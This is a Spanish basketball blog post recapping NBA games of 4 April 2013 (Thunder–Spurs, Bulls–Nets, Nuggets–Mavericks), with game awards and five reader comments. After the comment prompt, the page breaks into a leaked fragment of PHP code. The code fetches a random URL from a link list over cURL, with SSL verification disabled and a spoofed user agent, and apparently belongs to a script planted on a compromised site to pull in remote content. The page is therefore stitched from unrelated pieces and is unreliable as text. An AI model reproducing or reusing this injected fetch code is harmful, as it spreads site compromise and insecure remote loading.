La Crónica: Golpe de Oklahoma

05 de April de 2013 por Viva_Dirk

La atención en la jornada de ayer se centraba en el Chesapeake Energy Arena de Oklahoma donde se enfrentaban 1º y 2º de la conferencia Oeste. Los Thunders se llevaron el partido gracias a su conocida superioridad física y a un gran día desde la linea de 3 (88-100). Westbrook&Durant cumplieron con lo que se espera de ellos al igual que Ibaka. Además los 3 vieron como se unía a la fiesta nada menos que Derek Fisher con 17 puntos y un 5 de 7 en triples. Los Spurs vivieron uno de los peores partidos de la carrera de un renqueante Tony Parker que en 25 minutos anotó sólo 2 puntos y además de no pudieron contar con otros ilustres secundarios. No fueron suficientes los partidazos de Leonard y Duncan. Con esto los Thunders se colocan a un partido de los de Popovich. Veremos si el entrenador de los Spurs continúa con su política de descansos a final de la regular season.

Unas horas antes los Bulls, con un saco de bajas importantes, se llevaron la victoria de Brooklyn (92-90). La culpa fue en gran parte de Carlos Boozer, que atraviesa un gran momento, y de un dominio aplastante de los visitantes en el rebote, apartado en el que Boozer y Butler capturaron 2 rebotes menos que todos los Nets juntos. En los locales gran partido de Deron Williams y 28 puntos de Brook Lopez, pero salvo los 13 rebotes de Reggie Evans nadie mas se sumó a la causa. De hecho fuera de Lopez&Williams, el resto hizo un 12 de 35 en tiros. Los Bulls, a la espera de la vuelta de Rose y Noah van a ser un hueso tremendo para cualquiera. 

En Denver los Nuggets alejaron aún más a los Mavs de playoffstras una buena remontada en el último cuarto. El mal día en el tiro de los locales pudo ser suplido con 18 rebotes ofensivos y lanzando el triple de tiros libres que su rival. Andre Miller le dio clases particulares a Darren Collison mientras que Faried se fue hasta los 19 rebotes y Brewer ejercía a la perfección de 6º hombre. En los Mavs no destacó nadie pero son ya muchos partidos los que lleva OJ Mayo decepcionando. Ayer cometió 6 faltas en 23 minutos en los que había anotado 4 puntos. Atención que Danilo Gallinari pudo haberse lesionado gravemente en una jugada de la primera parte. Hoy le harán pruebas para conocer el alcance de la lesión.

PREMIOS

MVP: Premio sin duda para Carlos Boozer que se ha echado el equipo a la espalda. Anoche regaló 29 puntos y 18 rebotes a los Nets. El podio lo completan 2 bases; los 22 puntos y 7 asistencias de Andre Miller y Russell Westbrook con 27-7-7 en la victoria ante el líder de conferencia.

Sorpresa: Corey Brewer está cuajando una gran campaña pero aun así no es fácil verle convertido en el máximo anotador de los Nuggets. Sus 23 puntos de ayer fueron vitales para su equipo. Los 17 puntos del abuelo Derek Fisher también hay que nombrarlo.

Decepción: OJ Mayo lleva tiempo decepcionándonos pero lo que no esperábamos era un infame partido de Tony Parker en Oklahoma: 2 puntos, 4 asistencias y 1 de 6 en tiros. Si jugó con molestias mejor que no hubiera jugado.

Esfuerzo en vano: Premio muy disputado con tremendas actuaciones entre los perdedores. Kawhi Leonard anotó 24 puntos, cogió 14 rebotes y repartió 6 asistencias mientras que Deron Williams hizo 30 puntos y 10 asistencias. Os dejamos decidir.

Imágenes | AP Photos / Getty Images

Comenta

5 comentarios a esta entrada

  1. GreenPride dice:
    #1

    Malditas lesiones!!! Ahora que se acercan los PO las lesiones nos pueden dejar muy lastrado a uno de los equipos llamados a animar los PO en el Oeste. Los Denver Nuggets están con su base titular y jugador clutch Ty Lawson fuera del equipo de manera indefinida y ayer probablemente perdieron a Gallinari por lo que resta de campaña. A falta de los análisis de hoy, viendo la jugada la cosa tiene muy mala pinta para él. Una pena si al final se confirmasen los malos augurios porque los Nuggets están llamados a hacer mucho ruido este año. Aún así ayer se las apañaron para dar el último palo a los Mavs que se despiden de sus últimas opciones de PO mientras Denver conserva su tercera plaza en durísima lucha con Memphis.
    En lo alto de la conferencia, los Thunder aprovecharon jugar en casa y también de nuevo las lesiones en San Antonio. Con Parker muy mermado y Ginobilli fuera los Spurs no pueden aspirar a ser candidatos al anillo. Si además les falta Stephen Jackson demasiado hicieron con llegar igualados al final. El partido fue calcado prácticamente en cada cuarto. Arreón inicial de los Thunder que les lleva a ventajas claras que poco a poco van limando los Spurs para quedarse relativamente cerca. Al final las actuaciones de Durant&Westbrook dieron el triunfo a los Thunder aunque su juego abusando del 1×1 no me acaba de convencer para las batallas de PO. Por los Spurs más prioritario que el nº1 del Oeste es la salud. Necesitan a Parker, Ginobilli y Jackson sanos para poder aspirar a todo y de momento no los tienen.
    Por otra parte milagroso lo de los Bulls que aún tienen opciones de tener ventaja campo por encima de los Nets a los que precisamente ganaron ayer. Veremos si al final vuelve Rose y si lo hace en forma. Si es así y recuperan a Noah mucho cuidado con ellos, porque podrían ser la verdadera piedra de los Heat en el camino a las finales…

      Citar

  2. Ruxixón dice:
    #2

    Veremos que hace Cuban pero puestos a gastar dinero prefiero gastarlo con Monta Ellis que en OJ Mayo,vaya final de temporada para él.Personalmente pensaría que explotaría esta temporada al estilo Harden,no tanto,pero pensaba que había un escolta de élite por muchos años.Lo peor es que no sé en qué estilo de equipo podría encajar este tio

      Citar

  3. Jose Luis dice:
    #3

    Dallas fue incapaz de anotar en los dos últimos minutos… madre mía. Estos no se afeitan hasta octubre-noviembre, donde empezarán 0-0 (¿se considerará .500?)

      Citar

  4. Esteban dice:
    #4

    Mayo sexto hombre, genial para los pacers, 20 millones por 3 años seria un acuerdo logico

      Citar

  5. Esteban dice:
    #5

    Jose Luis:
    Dallas fue incapaz de anotar en los dos últimos minutos… madre mía. Estos no se afeitan hasta octubre-noviembre, donde empezarán 0-0 (¿se considerará .500?)

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>